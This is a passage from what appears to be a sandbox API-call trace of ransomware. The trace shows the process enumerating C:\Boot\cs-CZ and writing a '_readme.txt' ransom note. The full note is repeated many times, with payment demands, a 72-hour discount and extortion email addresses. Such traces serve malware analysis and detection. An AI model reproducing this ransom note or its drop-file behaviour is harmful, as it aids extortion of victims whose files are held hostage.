hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59fb0 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a598a8 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31fd50 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3144c0 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3b38 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac3b60 | out: hHeap=0x2c0000) returned 1 [0173.611] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.612] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a590d8 [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.612] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.612] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.612] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.612] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.612] PathFindFileNameW (pszPath="") returned="" [0173.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.612] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.613] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.613] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.613] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8ca68 [0173.614] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0173.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.614] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0173.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.614] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.614] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.614] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.615] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.615] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.617] CloseHandle (hObject=0x690) returned 1 [0173.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.617] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e440c80, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e440c80, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.618] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e440c80, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e440c80, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.618] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.618] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e440c80, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e440c80, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e466de0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.618] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e440c80, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e440c80, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e466de0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.618] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.618] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 